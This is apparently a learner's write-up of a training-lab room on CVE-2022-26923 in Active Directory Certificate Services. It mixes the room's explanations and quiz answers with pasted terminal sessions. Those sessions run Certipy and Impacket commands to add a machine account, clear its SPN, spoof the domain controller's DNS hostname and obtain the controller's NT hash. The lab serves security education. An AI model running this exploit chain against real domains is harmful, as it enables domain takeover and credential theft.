CVE 2022 26923


Walkthrough on the exploitation of CVE-2022-26923, a vulnerability in AD Certificate Services.

Introduction

Start Machine

This room explores CVE-2022-26923, a vulnerability in Microsoft's Active Directory Certificate Service (AD CS) that allows any AD user to escalate their privileges to Domain Admin in a single hop!

Research done and released as a whitepaper by SpecterOps showed that it was possible to exploit misconfigured certificate templates for privilege escalation and lateral movement. Based on the severity of the misconfiguration, it could allow any low-privileged user on the AD domain to escalate their privilege to that of an Enterprise Domain Admin with just a few clicks. If you are interested in learning more about these Certificate Template exploits, see this room.

Further research was performed by Oliver Lyak, who discovered an additional vulnerability (CVE-2022-26923) in the Certificate Service. A patch was released for the vulnerability by Microsoft on the 10th of May. You can read more about the research here. This room provides a walkthrough of the exploitation of the vulnerability, as detailed in the research.

Start the VM to begin the room. You will be using SSH to connect later in the room, so make sure to either use the THM VPN or the AttackBox. The following low privileged credentials are provided below. Please allow around 5 minutes for the machine to fully boot.

Username: thm

Password: Password1@

Domain: lunar.eruca.com

Answer the questions below

Read the above

Completed

┌──(witty㉿kali)-[~/bug_hunter]
└─$ ssh thm@10.10.188.193       
The authenticity of host '10.10.188.193 (10.10.188.193)' can't be established.
ED25519 key fingerprint is SHA256:50ZqYlTFUYKTHHPzgPNzG0gSydLnknXL0Ea7lUs7tT8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.188.193' (ED25519) to the list of known hosts.
thm@10.10.188.193's password: 

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

lunar\thm@LUNDC C:\Users\thm>whoami
lunar\thm

A brief look at certificate templates

Windows Active Directory (AD) is not just for identity and access management but provides a significant amount of services to help you run and manage your organisation. Many of these services are less commonly known or used, meaning they are often overlooked when security hardening is performed. One of these services is the Active Directory Certificate Services (AD CS).

When talking about certificates, we usually only think about the most common ones, such as those used to upgrade website traffic to HTTPS. But these are generally only used for applications that the organisation exposes to the internet. What about all those applications running on the internal network? Do we now have to give them internet access to allow them to request a certificate from a trusted Certificate Authority (CA)? Well, not really. Cue AD CS.

AD CS is Microsoft's Public Key Infrastructure (PKI) implementation. Since AD provides a level of trust in an organisation, it can be used as a CA to prove and delegate trust. AD CS is used for several things, such as encrypting file systems, creating and verifying digital signatures, and even user authentication, making it a promising avenue for attackers. What makes it an even more dangerous attack vector, is that certificates can survive credential rotation, meaning even if a compromised account's password is reset, that will do nothing to invalidate the maliciously generated certificate, providing persistent credential theft for up to 10 years! The diagram below shows what the flow for certificate requests and generation looks like (taken from SpecterOps whitepaper):

Since AD CS is such a privileged function, it normally runs on selected domain controllers. Meaning normal users can't really interact with the service directly. On the other side, organisations tend to be too large to have an administrator create and distribute each certificate manually. This is where certificate templates come in. Administrators of AD CS can create several templates that can allow any user with the relevant permissions to request a certificate themselves. These templates have parameters that say which user can request the certificate and what is required. What SpecterOps has found, was that specific combinations of these parameters can be incredibly toxic and be abused for privilege escalation and persistent access!

Before we dive deeper into certificate abuse, some terminology:

  • PKI - Public Key Infrastructure is a system that manages certificates and public key encryption

  • AD CS - Active Directory Certificate Services is Microsoft's PKI implementation which usually runs on domain controllers

  • CA - Certificate Authority is a PKI that issues certificates

  • Certificate Template - a collection of settings and policies that defines how and when a certificate may be issued by a CA

  • CSR - Certificate Signing Request is a message sent to a CA to request a signed certificate

  • EKU - Extended/Enhanced Key Usage are object identifiers that define how a generated certificate may be used

Answer the questions below

Read the above.

Completed

What does the user create to ask the CA for a certificate?

CSR for short

Certificate Signing Request

What is the name of Microsoft's PKI implementation?

Active Directory Certificate Service

CVE-2022-26923 explained

Client Authentication

As discussed in the overview of Certificate Templates, they are convenient to allow users and systems to enrol for certificates. Certificates have many use cases in the network. For CVE-2022-26923 and the template misconfigurations discovered by SpectorOps, the primary focus is on the Client Authentication use case.

Client Authentication allows the owner of the certificate to use it to verify their own identity in AD for authentication purposes. For example, a client certificate is used to authenticate against a web application. The authentication process occurs through Kerberos. If we have a valid certificate that has the Client Authentication EKU, we can interface with AD CS and the Key Distribution Centre to request a Kerberos TGT that can then be used for further authentication.

As an attacker, we can leverage this to generate a TGT to impersonate another user or system, should we have a valid certificate for them. In essence, we want to be able to modify the Subject Alternative Name (SAN) attribute of the certificate request to point to someone or something else, that has more permissions to perform privilege escalation.

Default Certificate Templates

By default, when AD CS is installed in an environment, two certificate templates are made available for requests that support Client Authentication:

  • User Certificate Template - This certificate template can be requested by any user that belongs to the Domain Users group.

  • Machine Certificate Template - This certificate template can be requested by any host that belongs to the Domain Computers group.

The User Template is not vulnerable by default. When we request a certificate based on the User template, the User Principal Name (UPNs) of the user account will be embedded in the SAN that can be used for identification. Since UPNs must be unique, and we usually do not have the ability to modify our UPN, we cannot leverage this template. Furthermore, since we don't have the ability to alter the SAN value in the certificate signing request, we cannot impersonate another user by specifying their UPN.

However, computer accounts do not have a UPN. Instead of using a UPN for authentication, the Machine template uses the DNS Name of the machine for identification and authentication. When a certificate is requested for a machine through the Machine template, AD CS embeds the machine's DNS Name into the SAN, which is then used for authentication.

Default Domain User Privileges

By default, any user who is a member of the Authenticated Users group (literally all AD accounts) can enrol up to 10 new machines on the domain. This is often used in organisations to allow users to bring their own device (BYOD) and enrol it for use on the domain. This in itself is not really a vulnerability but has led to some interesting privilege escalation vectors in the path, exactly what we will be exploiting for this CVE.

When we enrol a new host in AD, we are assigned as the owner of that host. This provides us with certain permissions over the AD Object associated with that host. Two permissions in particular cause an issue here:

  • Validate write to DNS hostname - This permission allows us to update the DNS hostname of our AD Object associated with the host.

  • Validate write to Service Principal Name (SPN) - This permission allows us to update the SPN of our AD Object associated with the host.

SPNs are used by Kerberos authentication to associate a service instance with a service logon account. By default, the Computer AD Object receives SPNs associated with their name to allow for Kerberos authentication, which the host requires to perform specific requests against AD. SPNs must be unique, meaning two AD Objects are not allowed to have the same SPN.

You would think it would be as simple as changing the DNS hostname to another hostname, maybe the hostname of a Domain Controller for privilege escalation? However, if you change the DNS hostname, Microsoft automatically updates the SPN attribute. Since those must be unique, we will get an error if we try to impersonate another host through the DNS hostname attribute. But since we have the ability also to change the SPN, we can bypass this restriction.

The pieces of the puzzle should now start to come together. If we only had one of the two permissions, we would not have a vulnerability. However, the combination of having those two permissions allows us to perform privilege escalation.

Putting it all Together

Using these configurations, the default AD CS Machine certificate template, the default ability to enrol a new machine, and the default permissions assigned on the created Computer AD Object, we have a privilege escalation vector on our hands. What makes it worse is that this privilege escalation vector requires minimal effort, meaning the attacker's skill level to exploit this issue is quite low. The basic steps are the following:

  1. Compromise the credentials of a low-privileged AD user.

  2. Use those credentials to enrol a new host on the domain.

  3. Alter the DNS hostname attribute of the Computer AD Object to that of a privileged host, such as a Domain Controller.

  4. Remove the SPN attributed to bypass the unique SPN conflict issue.

  5. Request a Machine certificate using the default template.

  6. Perform Kerberos authentication with the received template, now as the privileged machine account instead of our fake machine account.

In the next task, we will practically perform these steps!

Answer the questions below

Which EKU allows us to use the generated certificate for Kerberos authentication?

Client Authentication

What AD group can request a certificate using the Machine Certificate Template?

Domain Computers

What value in the Machine Certificate is used for identification and authentication?

DNS hostname

Exploiting CVE-2022-26923

Now that we have covered the theory. Let's see it in action.

Configuring DNS

First, we need to configure some DNS values. Modify your /etc/hosts file and add the following entry:

/etc/hosts

10.10.188.193 lundc.lunar.eruca.com lundc lunar-LUNDC-CA lunar.eruca.com

Testing Certificate Generation

Similar to the blog post, we will use Certipy for our exploitation, which has been installed for you on the AttackBox. Certipy is an offensive tool for enumeration and exploitation of AD CS vulnerabilities and misconfigurations. It integrates with Impacket for some of the exploits, so if you are installing this on your own machine, make sure to update Impacket as well. We have created a virtual python environment with all of these tools. If you are using the AttackBox, start by activating the virtual environment:

AttackBox Terminal

[thm@thm]$ source /root/Rooms/CVE2022-26923/certipy/bin/activate

Let's first get our feet wet with generating a certificate for our low-privileged AD user (Username=thm Password=Password1@) using the User certificate template:

AttackBox Terminal

(certipy) [thm@thm]$ certipy req 'lunar.eruca.com/thm:Password1@@lundc.lunar.eruca.com' -ca LUNAR-LUNDC-CA -template User
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 20
[*] Got certificate with UPN 'thm@lunar.eruca.com'
[*] Saved certificate and private key to 'thm.pfx'

Note: If you get a timeout error for this command or any of the rest of the Certipy commands, just wait two seconds and then run it again. Unfortunately, with a UDP VPN connection, it is not always sufficiently stable for these requests to pass through.

We can verify that this certificate is valid and can be used for Kerberos authentication through Certipy as well:

AttackBox Terminal

(certipy) [thm@thm]$ certipy auth -pfx thm.pfx
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: thm@lunar.eruca.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'thm.ccache'
[*] Trying to retrieve NT hash for 'thm'
[*] Got NT hash for 'thm@lunar.eruca.com': 43460d636f269c709b20049cee36ae7a

Certipy performs authentication with the certificate and uses Impacket to recover the NTLM hash associated with the UPN specified in the certificate. We could, of course, use something like Rubeus to request a TGT and then import that with Mimikatz for attacks, but this at least proves that the certificate is valid and can be used for Kerberos authentication.

Adding a Computer to the Domain

We need to add a new computer to the domain to generate a Machine certificate. Luckily, we don't have to add a physical computer to the network. We can use Impacket's addcomputer.py script to simply make it look like we are adding a new computer:

AttackBox Terminal

(certipy) [thm@thm]$ addcomputer.py 'lunar.eruca.com/thm:Password1@' -method LDAPS -computer-name 'THMPC' -computer-pass 'Password1@'
Impacket v0.10.1.dev1 - Copyright 2022 SecureAuth Corporation

[*] Successfully added machine account THMPC$ with password Password1@.

Parameters explained:

  • lunar.eruca.com/thm:Password1@ - We need to provide valid AD credentials in order to add a new computer.

  • method - The method of authentication. LDAPS will interface with the LDAP service on the domain controller.

  • computer-name - The name of our computer. This can be anything we like, as long as it is not the same as an existing computer object.

  • computer-pass - The password associated with our computer's machine account. We will need to impersonate this computer that we create, so make note of the password you chose here.

First, let's generate a certificate for the new computer we created. To use the machine account of said computer, you need to add a "$" at the end of the name:

AttackBox Terminal

(certipy) [thm@thm]$ certipy req 'lunar.eruca.com/THMPC$:Password1@@lundc.lunar.eruca.com' -ca LUNAR-LUNDC-CA -template Machine
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 20
[*] Got certificate with DNS Host Name 'THMPC.lunar.eruca.com'
[*] Saved certificate and private key to 'thmpc.pfx'

Again we can verify that the certificate is valid by using Certipy:

AttackBox Terminal

(certipy) [thm@thm]$ certipy auth -pfx thmpc.pfx
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: thmpc$@lunar.eruca.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'thmpc.ccache'
[*] Trying to retrieve NT hash for 'thmpc$'
[*] Got NT hash for 'thmpc$@lunar.eruca.com': 43460d636f269c709b20049cee36ae7a

We can verify the NTLM hash recovered against the password we set for the machine account using an NTLM Generator.

Updating the DNS Hostname and SPN Attributes

In order to update the AD object's attributes, we will use the AD-RSAT PowerShell cmdlets. You can use the following command on the AttackBox to SSH into the machine:

AttackBox Terminal

[thm@thm]$ ssh lunar.eruca.com\\thm@lundc

Once you're in, start Powershell:

SSH Terminal

lunar\thm@LUNDC C:\Users\thm>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\thm>

Let's first just get the current attributes from our Computer AD Object using the Get-ADComputer cmdlet:

SSH Terminal

PS C:\Users\thm>Get-ADComputer THMPC -properties dnshostname,serviceprincipalname

DistinguishedName    : CN=THMPC,CN=Computers,DC=lunar,DC=eruca,DC=com                                                                
DNSHostName          : THMPC.lunar.eruca.com                                                                                         
Enabled              : True                                                                                                           
Name                 : THMPC2ObjectClass          : computer                                                                                                       
ObjectGUID           : f40260ee-2f74-4fa1-aa4c-f83bcf589c15                                                                           
SamAccountName       : THMPC$                                                                                                        
serviceprincipalname : {RestrictedKrbHost/THMPC.lunar.eruca.com, RestrictedKrbHost/THMPC, HOST/THMPC.lunar.eruca.com, HOST/THMPC} 
SID                  : S-1-5-21-3330634377-1326264276-632209373-11218                                                                 
UserPrincipalName    : 

We can see that both the DNS hostname and the SPN attributes are set to match our computer's name. Let's try to update the DNS hostname attribute to that of the DC using the Set-ADComputer cmdlet:

SSH Terminal

PS C:\Users\thm>Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com
Set-ADComputer : The operation failed because SPN value provided for addition/modification is not unique forest-wide 
At line:1 char:1                                                                                                     
+ Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com                                                           
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                           
    + CategoryInfo          : NotSpecified: (THMPC:ADComputer) [Set-ADComputer], ADException                        
    + FullyQualifiedErrorId : ActiveDirectoryServer:8647,Microsoft.ActiveDirectory.Management.Commands.SetADComputer

As we can see from the output, Microsoft automatically changes the SPN attribute when we set the DNS hostname. Since an SPN already exists for LUNDC, the command fails. To counter this, let's first remove our current SPN attribute:

SSH Terminal

PS C:\Users\thm>Set-ADComputer THMPC -ServicePrincipalName @{}
PS C:\Users\thm>

Now that we have flushed our Computer AD Object's SPN, let's again try to set the DNS hostname attribute to that of the DC:

SSH Terminal

PS C:\Users\thm>Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com
PS C:\Users\thm>

That is positive. No error this time. Let's verify that the changes were made:

SSH Terminal

PS C:\Users\thm>Get-ADComputer THMPC -properties dnshostname,serviceprincipalname

DistinguishedName : CN=THMPC,CN=Computers,DC=lunar,DC=eruca,DC=com 
DNSHostName       : LUNDC.lunar.eruca.com                           
Enabled           : True
Name              : THMPC
ObjectClass       : computer
ObjectGUID        : f40260ee-2f74-4fa1-aa4c-f83bcf589c15 
SamAccountName    : THMPC$
SID               : S-1-5-21-3330634377-1326264276-632209373-11218
UserPrincipalName :

Perfect! By simply removing our SPNs, Microsoft no longer tries to change those when we change our DNS hostname, meaning we can change it to a legitimate host's DNS hostname.

Forging a Malicious Certificate

Time to regenerate some certificates! Let's run that same command of Certipy again to request a new certificate for our computer:

AttackBox Terminal

(certipy) [thm@thm]$ certipy req 'lunar.eruca.com/THMPC$:Password1@@lundc.lunar.eruca.com' -ca LUNAR-LUNDC-CA -template Machine
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 21
[*] Got certificate with DNS Host Name 'LUNDC.lunar.eruca.com'
[*] Saved certificate and private key to 'lundc.pfx'

This time we noticed something different. Even though we requested a certificate for THMPC, we got a certificate for LUNDC. Let's verify that this certificate is working and will return the NTLM hash of the LUNDC machine account instead:

AttackBox Terminal

(certipy) [thm@thm]$ certipy auth -pfx lundc.pfx
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: lundc$@lunar.eruca.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'lundc.ccache'
[*] Trying to retrieve NT hash for 'lundc$'
[*] Got NT hash for 'thmpc$@lunar.eruca.com': <Redacted>

We officially have the NTLM hash for the machine account of LUNDC! Since LUNDC is a domain controller and we have administrative access to the DC, we have fully compromised the domain in one hop! If you want to take this further, you can follow the steps in Task 5 of the previous AD CS room to request a TGT using the certificate and alter the password on one of the DA's just to prove that you have indeed fully compromised the domain.

Answer the questions below

┌──(witty㉿kali)-[~/Downloads]
└─$ mkdir CVE-2022-26923
                                                                                  
┌──(witty㉿kali)-[~/Downloads]
└─$ cd CVE-2022-26923 
                                                                                  
┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ ls
                                                                                  
┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ sudo nano /etc/hosts      
[sudo] password for witty: 
                                                                                  
┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ tail /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters

10.10.188.193 lundc.lunar.eruca.com lundc lunar-LUNDC-CA lunar.eruca.com

https://www.kali.org/tools/certipy-ad/

┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ sudo apt install certipy-ad
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  dh-elpa-helper docutils-common python3-alabaster python3-docutils
  python3-imagesize python3-roman python3-snowballstemmer python3-speaklater
  python3-sphinx sphinx-common
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
  certipy-ad
0 upgraded, 1 newly installed, 0 to remove and 112 not upgraded.
Need to get 0 B/90.4 kB of archives.
After this operation, 534 kB of additional disk space will be used.
(Reading database ... 420753 files and directories currently installed.)
Preparing to unpack .../certipy-ad_4.0.0-0kali1_all.deb ...
Unpacking certipy-ad (4.0.0-0kali1) ...
Setting up certipy-ad (4.0.0-0kali1) ...
Processing triggers for kali-menu (2022.4.1) ...
Scanning processes...                                                             
Scanning processor microcode...                                                   
Scanning linux images...                                                          

                                                                                  
┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ certipy-ad -h
Certipy v4.0.0 - by Oliver Lyak (ly4k)

usage: certipy-ad [-v] [-h]
                  {account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template}
                  ...

Active Directory Certificate Services enumeration and abuse

positional arguments:
  {account,auth,ca,cert,find,forge,ptt,relay,req,shadow,template}
                        Action
    account             Manage user and machine accounts
    auth                Authenticate using certificates
    ca                  Manage CA and certificates
    cert                Manage certificates and private keys
    find                Enumerate AD CS
    forge               Create Golden Certificates
    ptt                 Inject TGT for SSPI authentication
    relay               NTLM Relay to AD CS HTTP Endpoints
    req                 Request certificates
    shadow              Abuse Shadow Credentials for account takeover
    template            Manage certificate templates

options:
  -v, --version         Show Certipy's version number and exit
  -h, --help            Show this help message and exit

doing in attackbox


root@ip-10-10-15-15:~# nano /etc/hosts
root@ip-10-10-15-15:~# ls
Desktop    Instructions  Postman  Scripts            Tools
Downloads  Pictures      Rooms    thinclient_drives
root@ip-10-10-15-15:~# source /root/Rooms/CVE2022-26923/certipy/bin/activate
(certipy) root@ip-10-10-15-15:~# certipy req 'lunar.eruca.com/thm:Password1@@lundc.lunar.eruca.com' -ca LUNAR-LUNDC-CA -template User
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
(certipy) root@ip-10-10-15-15:~# certipy req 'lunar.eruca.com/thm:Password1@@lundc.lunar.eruca.com' -ca LUNAR-LUNDC-CA -template User
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
(certipy) root@ip-10-10-15-15:~# certipy req 'lunar.eruca.com/thm:Password1@@lundc.lunar.eruca.com' -ca LUNAR-LUNDC-CA -template User
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'thm@lunar.eruca.com'
[*] Saved certificate and private key to 'thm.pfx'
(certipy) root@ip-10-10-15-15:~# ls
Desktop    Instructions  Postman  Scripts            thm.pfx
Downloads  Pictures      Rooms    thinclient_drives  Tools

(certipy) root@ip-10-10-15-15:~# certipy auth -pfx thm.pfx
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: thm@lunar.eruca.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'thm.ccache'
[*] Trying to retrieve NT hash for 'thm'
[*] Got NT hash for 'thm@lunar.eruca.com': 43460d636f269c709b20049cee36ae7a



I see is a different version so

┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ certipy-ad req -u thm@lunar.eruca.com -p Password1@ -ca LUNAR-LUNDC-CA -template User

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 19
[*] Got certificate with UPN 'thm@lunar.eruca.com'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'thm.pfx'
                                                                                  
┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ ls                   
thm.pfx
                                                                                  
┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ file thm.pfx 
thm.pfx: data

┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ certipy auth -pfx thm.pfx
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: thm@lunar.eruca.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'thm.ccache'
[*] Trying to retrieve NT hash for 'thm'
[*] Got hash for 'thm@lunar.eruca.com': aad3b435b51404eeaad3b435b51404ee:43460d636f269c709b20049cee36ae7a

┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ certipy-ad auth -pfx thm.pfx
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: thm@lunar.eruca.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'thm.ccache'
[*] Trying to retrieve NT hash for 'thm'
[*] Got hash for 'thm@lunar.eruca.com': aad3b435b51404eeaad3b435b51404ee:43460d636f269c709b20049cee36ae7a

seems different the reponse (nope is the same)

┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ /usr/share/doc/python3-impacket/examples/addcomputer.py 'lunar.eruca.com/thm:Password1@' -method LDAPS -computer-name 'THMPC' -computer-pass 'Password1@'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Successfully added machine account THMPC$ with password Password1@.

(certipy) root@ip-10-10-15-15:~# addcomputer.py 'lunar.eruca.com/thm:Password1@' -method LDAPS -computer-name 'THMPC' -computer-pass 'Password1@'
Impacket v0.10.1.dev1 - Copyright 2022 SecureAuth Corporation

[-] Account THMPC$ already exists! If you just want to set a password, use -no-add.

yep cz I've already created it.

(certipy) root@ip-10-10-15-15:~# certipy req 'lunar.eruca.com/THMPC$:Password1@@lundc.lunar.eruca.com' -ca LUNAR-LUNDC-CA -template Machine
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 20
[*] Got certificate with DNS Host Name 'THMPC.lunar.eruca.com'
[*] Saved certificate and private key to 'thmpc.pfx'
(certipy) root@ip-10-10-15-15:~# certipy auth -pfx thmpc.pfx
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: thmpc$@lunar.eruca.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'thmpc.ccache'
[*] Trying to retrieve NT hash for 'thmpc$'
[*] Got NT hash for 'thmpc$@lunar.eruca.com': 43460d636f269c709b20049cee36ae7a

so 1st create a certificate template user then add a machine and add a certificate template machine

┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ certipy-ad req -u 'THMPC$@lunar.eruca.com' -p Password1@ -ca LUNAR-LUNDC-CA -template Machine

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 21
[*] Got certificate with DNS Host Name 'THMPC.lunar.eruca.com'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'thmpc.pfx'
                                                                                  
┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ certipy-ad auth -pfx thmpc.pfx
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Using principal: thmpc$@lunar.eruca.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'thmpc.ccache'
[*] Trying to retrieve NT hash for 'thmpc$'
[*] Got hash for 'thmpc$@lunar.eruca.com': aad3b435b51404eeaad3b435b51404ee:43460d636f269c709b20049cee36ae7a

┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ ssh lunar.eruca.com\\thm@lundc
The authenticity of host 'lundc (10.10.188.193)' can't be established.
ED25519 key fingerprint is SHA256:50ZqYlTFUYKTHHPzgPNzG0gSydLnknXL0Ea7lUs7tT8.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:3: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'lundc' (ED25519) to the list of known hosts.
lunar.eruca.com\thm@lundc's password: 

Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

lunar\thm@LUNDC C:\Users\thm>

lunar\thm@LUNDC C:\Users\thm>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\thm> Get-ADComputer THMPC -properties 
Get-ADComputer : Missing an argument for parameter 'Properties'. Specify a  
parameter of type 'System.String[]' and try again.
At line:1 char:22
+ Get-ADComputer THMPC -properties
+                      ~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Get-ADComputer], ParameterBi  
   ndingException
    + FullyQualifiedErrorId : MissingArgument,Microsoft.ActiveDirectory.Manageme  
   nt.Commands.GetADComputer
 
PS C:\Users\thm> Get-ADComputer THMPC -properties dnshostname,serviceprincipalname



DistinguishedName    : CN=THMPC,CN=Computers,DC=lunar,DC=eruca,DC=com 
DNSHostName          : THMPC.lunar.eruca.com
Enabled              : True
Name                 : THMPC
ObjectClass          : computer
ObjectGUID           : 8642d06f-e165-4484-a647-3153d87e0f41
SamAccountName       : THMPC$
serviceprincipalname : {RestrictedKrbHost/THMPC.lunar.eruca.com,
                       RestrictedKrbHost/THMPC, HOST/THMPC.lunar.eruca.com,       
                       HOST/THMPC}
SID                  : S-1-5-21-3330634377-1326264276-632209373-11217
UserPrincipalName    :

PS C:\Users\thm> Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com
Set-ADComputer : The operation failed because SPN value provided for  
addition/modification is not unique forest-wide
At line:1 char:1
+ Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (THMPC:ADComputer) [Set-ADComputer],  
    ADException
    + FullyQualifiedErrorId : ActiveDirectoryServer:8647,Microsoft.ActiveDirecto  
   ry.Management.Commands.SetADComputer
   
PS C:\Users\thm> Set-ADComputer THMPC -ServicePrincipalName @{}
PS C:\Users\thm> 

The PowerShell command `Set-ADComputer THMPC -ServicePrincipalName @{}` sets the service principal name (SPN) attribute for the computer object `THMPC` in Active Directory to an empty hashtable.

In Active Directory, the SPN attribute is used to associate a service with a particular account, and is typically used in the context of Kerberos authentication. By default, when a computer is joined to a domain, it is registered with Active Directory and assigned an SPN in the form of `HOST/hostname` or `HOST/fqdn`, where `hostname` is the short name of the computer and `fqdn` is the fully qualified domain name.

PS C:\Users\thm> Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com
PS C:\Users\thm>  

PS C:\Users\thm> Get-ADComputer THMPC -properties dnshostname,serviceprincipalname



DistinguishedName : CN=THMPC,CN=Computers,DC=lunar,DC=eruca,DC=com
DNSHostName       : LUNDC.lunar.eruca.com
Enabled           : True
Name              : THMPC
ObjectClass       : computer
ObjectGUID        : 8642d06f-e165-4484-a647-3153d87e0f41
SamAccountName    : THMPC$
SID               : S-1-5-21-3330634377-1326264276-632209373-11217
UserPrincipalName :

:)

The PowerShell command `Get-ADComputer THMPC -properties dnshostname,serviceprincipalname` retrieves the computer object with the name `THMPC` from Active Directory and returns the values of the `dnshostname` and `serviceprincipalname` properties.

The output you provided shows the result of running this command. The output includes the following properties:

-   `DistinguishedName`: The distinguished name (DN) of the computer object in Active Directory.
-   `DNSHostName`: The DNS host name of the computer.
-   `Enabled`: Indicates whether the computer account is enabled or disabled.
-   `Name`: The name of the computer object.
-   `ObjectClass`: The object class of the computer object.
-   `ObjectGUID`: The globally unique identifier (GUID) of the computer object.
-   `SamAccountName`: The Security Account Manager (SAM) account name of the computer object.
-   `SID`: The security identifier (SID) of the computer object.
-   `UserPrincipalName`: The user principal name (UPN) of the computer object.

Based on the output, it appears that the `dnshostname` property is set to `LUNDC.lunar.eruca.com`, which is the fully qualified domain name (FQDN) of the domain controller that the computer is registered with. The `serviceprincipalname` property is not included in the output, which may indicate that no SPNs are currently set for the computer object.

(certipy) root@ip-10-10-15-15:~# certipy req 'lunar.eruca.com/THMPC$:Password1@@lundc.lunar.eruca.com' -ca LUNAR-LUNDC-CA -template Machine
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate
[*] Successfully requested certificate
[*] Request ID is 24
[*] Got certificate with DNS Host Name 'LUNDC.lunar.eruca.com'
[*] Saved certificate and private key to 'lundc.pfx'
(certipy) root@ip-10-10-15-15:~# certipy auth -pfx lundc.pfx
Certipy v3.0.0 - by Oliver Lyak (ly4k)

[*] Using principal: lundc$@lunar.eruca.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'lundc.ccache'
[*] Trying to retrieve NT hash for 'lundc$'
[*] Got NT hash for 'lundc$@lunar.eruca.com': 14fc9b5814def64289bb694f6659c733

It works!!

┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
└─$ certipy-ad req -u 'THMPC$@lunar.eruca.com' -p Password1@ -ca LUNAR-LUNDC-CA -template Machine
Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 25
[*] Got certificate with DNS Host Name 'LUNDC.lunar.eruca.com'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'lundc.pfx'
                                                                                  
┌──(witty㉿kali)-[~/Downloads/CVE-2022-26923]
